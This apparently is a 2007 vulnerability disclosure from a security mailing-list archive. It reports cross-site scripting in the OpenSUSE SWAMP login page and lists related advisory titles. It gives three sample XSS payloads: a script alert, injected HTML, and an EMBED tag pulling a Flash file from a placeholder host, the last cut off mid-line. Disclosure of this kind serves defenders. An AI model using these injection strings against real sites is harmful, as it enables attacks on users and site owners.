Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Bosdev Multiple vulnerabilities [Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar Aria-Security.Net [Web based alpha tabbed address book SQL Injection] Aleris Software Systems Web Publisher Calendar SQL injection From:morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com> Date:24.10.2007Subject:Novell OpenSUSE SWAMP multiple XSSVendor Site: http://en.opensuse.org/Swamp Version affected: ??? Demo:http://swampdemo.suse.de/webswamp/swamp/template/Index.vm Class: Input Validation Error Overview:OpenSUSE Workflow Administration and Management Platform login page fails to sufficiently sanitize user-supplied input data via login box. Example: 1.<script>alert('xss')</script> 2.<html><font color="Red"><b>XSS</b></font></html> 3.<EMBED SRC="http://site.com/xss.swf"
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Bosdev Multiple vulnerabilities
[Vulz] PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar
Aria-Security.Net [Web based alpha tabbed address book SQL Injection]
Aleris Software Systems Web Publisher Calendar SQL injection
